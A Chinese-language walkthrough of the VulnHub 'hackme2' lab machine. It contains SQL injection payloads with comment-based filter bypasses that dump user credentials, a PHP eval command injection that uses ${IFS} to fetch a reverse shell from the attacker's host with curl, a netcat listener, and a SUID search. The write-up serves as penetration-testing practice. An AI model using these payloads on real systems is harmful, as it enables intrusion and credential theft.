vulnhub-hackeme2

靶机描述

'hackme2' is a medium difficulty level box. This is the second part of the hackme series where more controls are in place do deter malicious attacks. In addition, you will have to think out of the box to exploit the vulnerabilites. The goal is to gain limited privilege access via web vulnerabilities and subsequently, privilege escalate as a root user. The lab was created to mimic real world web vulnerabilities.
 
 'hackme2' uses DHCP and in the possible event that the mysqld shuts down on its own (very rare cases), attempt to force restart the machine and it should be working fine subsequently.

下载 https://www.vulnhub.com/entry/hackme-2,618/

*清单*

• 信息搜集
• netdiscover
• nmap
• sql注入
• fuzz
• 命令执行
• 提权
• s位的后门文件

信息搜集

*靶机IP*

*端口扫描*

nmap -A -p- 192.168.31.184

Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open ssh     OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey:
 |   2048 6b:a8:24:d6:09:2f:c9:9a:8e:ab:bc:6e:7d:4e:b9:ad (RSA)
 |   256 ab:e8:4f:53:38:06:2c:6a:f3:92:e3:97:4a:0e:3e:d1 (ECDSA)
 |_ 256 32:76:90:b8:7d:fc:a4:32:63:10:cd:67:61:49:d6:c4 (ED25519)
 80/tcp open http   Apache httpd 2.4.34 ((Ubuntu))
 |_http-server-header: Apache/2.4.34 (Ubuntu)
 |_http-title: Site doesn't have a title (text/html; charset=UTF-8).

渗透测试

sql注入

*payload*

'union/**/select/**/group_concat(table_name),2,3/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/#
 
 得到
 books,users 2 3 SGD

'union/**/select/**/group_concat(column_name),2,3/**/from/**/information_schema.columns/**/where/**/table_schema=database()#
 
 得到
 id,bookname,price,id,user,pasword,name,address 2 3 SGD

'union/**/select/**/group_concat(user,pasword),2,3/**/from/**/users#
 
 在返回数据到得到superadmin
 以及密码密文

*解密*

https://crackstation.net/

获取shell

在登陆成功后尝试了文件上传功能

发现只能上传图片，并且上传后访问不到

在这里可以看到相比 hackme1 下面多了框框

*fuzz*

接下来使用 burp 对参数进行 fuzz

对参数 fname lname fuzz

字典选择 Fuzzing - full

*fuzz结果*

当输入 **id 时**

其返回了命令执行的结果

Fname s
 Lname `cat<welcomeadmin.php`
 
 得到源码

查看源代码

<?php
  $fname = $_POST["fname"];
  $lname = $_POST["lname"];
  $lname = preg_replace('/[;s]/','',$lname);
  if($fname=="" || $fname==" " || $lname=="" || $lname==" "){
  echo "You have to search with both First and Last name";
  }else{
  echo "The system is checking the backend for user: ".$fname ." ".$lname." ";
  echo "</br>";
  echo "</br>";
  echo "User ". $fname. " ";
  eval("echo ".$lname.";");
  echo " cannot be found";
 
  }
 ?>

$lname 会造成命令执行

得到shell

cp /usr/share/webshells/php/php-reverse-shell.php shell.php
 
 python3 -m http.server 80
 
 输入
 ;system('curl${IFS}http://192.168.31.171/shell.php${IFS}-o${IFS}shell.php');
 
 nc -lvp 1234
 
 访问shell.php
 
 得到shell

获取root

find / -user root -perm -4000 -print 2>/dev/null

*获取root*

相关推荐: AoiAWD 系统的安装和配置

最近打了几次AWD比赛，发现手中的工具依然不好用，在github上发现了AoiAWD，AoiAWD 是一个由Aodzip（安恒信息 海特实验室研究员、HAC战队成员）维护的一个针对于CTF AWD模式的开源项目。专为比赛设计，便携性好，低权限运行的EDR系统。…